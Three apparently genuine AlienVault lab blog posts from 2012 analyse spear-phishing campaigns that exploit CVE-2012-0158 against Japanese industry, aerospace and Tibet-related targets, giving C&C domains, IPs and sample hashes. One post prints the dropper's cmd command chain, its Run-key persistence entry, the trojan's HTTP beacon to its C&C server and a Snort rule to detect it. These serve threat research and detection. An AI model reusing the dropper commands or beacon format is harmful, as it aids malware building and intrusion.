AlienVault R&D Labs Portal. Get the latest news from our research.
Header

More attacks linked to CVE-2012-0158, the evolution of a threat step by step

May 14th, 2012 | Posted by Alberto Ortega in APT | Attacks | Exploits | Malware - (1 Comments)

CVE-2012-0158 vulnerability has been one of the main players in the information security scene during the last weeks. Since it was seen in the wild for the first time, attackers have been using it to break the security of specific targets.

We have been tracking one of these campaigns against one of the main steel industry corporations based in Japan. We will see how the attackers have been testing the exploits, starting the attack, and then improving it. All this just in a couple of days.

Since we can’t exactly determine where the attack comes from, we will see some evidences that could lead us to some conclusions.

One of the first samples found in the wild linked to this campaign is a specially crafted Microsoft Office file that uses CVE-2012-0158 to execute a malicious payload, then showing an embedded harmless MS Office file to the victim. All the other documents are very similar, but the payloads and the harmless documents are different each time.

The way to infect the targets is sending emails to specific key people in the organization.

Some of the harmless documents showed after exploitation are related to industrial products:

In this first sample the malicious dropped payload, named 0412test.exe, is a Microsoft Notepad binary from Windows XP Service Pack 2, Chinese Edition. This suggests that the attackers were doing the first tests in his own infrastructure to build the attack.

The next samples include malicious payloads that connect to a Command & Control server managed by the attackers, which is always the same IP. At this moment all the domains found point to 210.175.53.122, an IP address located in Japan.

The second sample found drops a Trojan Horse that connects to the C&C showing another Office document to the victim. This sample has a very reduced functionality. One interesting fact is the high antivirus detection ratio (23/42).

Analysis

The main feature of the next sample found is the antivirus detection ratio. Less than half than the previous one the day of the discovery (only 11/42). Now it has changed a bit.

Analysis

Finally, we found a sample with much more capabilities that the previous ones. It is more focused on stealing user credentials and retrieve internal information from the affected systems. It reads saved login credentials from Mozilla Firefox browser and hooks some Windows user inputs to collect information.

It also has two internal IP ranges (192.168.20.1-62, 10.18.104.88-245) hard-coded in the source code.

The antivirus detection ratio has decreased. The day of the discovery only 6/42 antivirus detected the threat. At the time of writing it is detected by five more.

Analysis

Each sample connects to one of the following domains, like we previously mentioned, all are pointing to the same IP.

touber.lagga.net
nasa.yorli.net

munite.vazuki.com
unbye.sqehom.com
tprovty.igekng.com

ernet.afywis.com
oeoe.yetrap.com
lence.kovmir.com

We will probably see more attacks as part of this campaign, with more advanced payloads. We’ve added the C&C IP address to our IP Reputation Database, and we will monitor these C&C servers to detect new threats coming from them.

Alberto Ortega

More Posts

, ,

MSUpdater Trojan found using CVE-2012-0158: Space and Missile Defense Conference

April 23rd, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits | Malware | Snort - (Comments Off)

The number of samples exploiting CVE-2012-0158 has been growing since we reported some of the first infections last week. We have been detecting several ongoing campaigns against several industries. One of the campaigns which attracted our attention is targeting the military and aerospace industry.

Some of the documents sent to the victims have still a low antivirus detection. For example, one of the files sent is called “SMD_Conference_2012.doc”.

https://www.virustotal.com/file/b2b2091ed7d211b713353affa7e4e6585ae8abbbc8fc3eede74d0c93f39a7f6b/analysis/

When the victim opens the malicious document, the shellcode drops the malware and a benign office file, then it executes the dropped binary and shows the office file:

cmd /c echo MZ>log1.txt && cmd /c copy /b log1.txt+fabc.scr abc.scr && cmd /c abc.scr && cmd /c del log1.txt && cmd /c del fabc.scr

cmd /c SMD_Conference2012.doc

So the victim will show the following document:

 

The binary created by the shellcode is a dropper that contains the actual malware embedded on a resource. After deciphering the content, it creates the new binary under \Documents and Settings\{UserName}\Local Settings\Application Data\GoogleUpdate.exe and creates the following registry key in order to maintain persistence:

\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

GoogleUpd SZ \”C:\\Documents and Settings\\Joe Maldive\\Local Settings\\Application Data\\GoogleUpdate.exe\”

The payload is detected as BKDR_FYNLOS.SM1 and has been used in order similar attacks in the past. The malware connects to the  C&C server with address 204.13.66.119.

The following HTTP request is sent to the C&C server:

GET /search54615?h1=51&h2=1&h3=fh17952&h4=FNFACAADHFBCEIFJFEFGFAAA HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible;AEAFAKEBFDENBMECAOAHFCAEABBDEJ;)
Host: 204.13.66.119
Connection: Keep-Alive

The values sent are the operating system version (5.1 = Windows XP), the encoded serial number of the machine and the encoded version of the machine name.

It seems to be a version of the trojan called MSUpdater that was described by Zscaler a few months ago.  Once again the group behind these attacks are using conference related subjects as a lure to target these industries.

You can use the following snort rule already present on Emerging Threats to detect the C&C traffic:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ET TROJAN Win32/Cryptrun.B/MSUpdater C&C traffic 1″; flow:from_client,established; content:”/search”; http_uri; content:”?h1=”; fast_pattern; http_uri; content:”&h2=”; distance:0; http_uri; content:”&h3=”; distance:0; http_uri; content:”User-Agent|3a| Mozilla/5.0 (compatible|3B|”; http_header; reference:url,blog.9bplus.com/kim-jong-il-pdf-malware; reference:url,www.seculert.com/reports/MSUpdaterTrojanWhitepaper.pdf; reference:url,research.zscaler.com/2012/01/msupdater-trojan-and-link-to-targeted.html; reference:url,blog.seculert.com/2012/01/msupdater-trojan-and-conference-invite.html; classtype:trojan-activity; sid:2014174; rev:4;)

 

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , ,

CVE-2012-0158, Tibet, Targeted Attacks and so on

April 18th, 2012 | Posted by jaime.blasco in APT | Attacks | Malware - (Comments Off)

As our friends at TrendMicro reported a couple of days ago that CVE-2012-0158 is being actively used on different spearphishing campaigns mainly against NGO’s and Tibet related organizations.

The vulnerability used was patched by Microsoft a week ago:

The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers “system state” corruption, as exploited in the wild in April 2012, aka “MSCOMCTL.OCX RCE Vulnerability.”

We have found several targeted RTF doc files dropping different trojans and RATs onto the victims. One of the malicious doc files is very similar to what TrendMicro described a couple of days ago but it shows how quick the attackers are adapting their code to what security companies release in order to avoid signature and AV detection.

Once you open the RTF document, it drops the malicious executable as well as a benign doc file:

Immolation Statement.doc

 

The dropped exe file has a low AV detection rate:

https://www.virustotal.com/file/b7c6522ce21bd230c33e3f250d9789395af932e7fc72c9e0c1304c0bbcaa5e61/analysis/1334789684/

https://www.virustotal.com/file/eb6901caaf90e7e04b5c79d33aaa4aa3f3139cfb179418f78555e0c724b9e09f/analysis/1334790589/

And more interesting is that it is digitally signed, apparently using the same signer described by TrendMicro but this time the certificate is valid and it has been signed the 16th.

 

The trojan connects to the following domains:

  • 1.test.3322.org.cn -> 64.62.224.75
  • 2.test.3322.org.cn -> 74.82.63.102
  • 3.test.3322.org.cn -> 74.82.63.102
  • 4.test.3322.org.cn -> 64.62.224.75
  • 123ewqasdcxz.xicp.net, now pointing to 0.0.0.0
  • hoop-america.oicp.net -> 222.132.195.5

We have collected several documents/mails exploiting CVE-2012-0158 and will publish more information about the ongoing campaigns. Stay tuned!

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , ,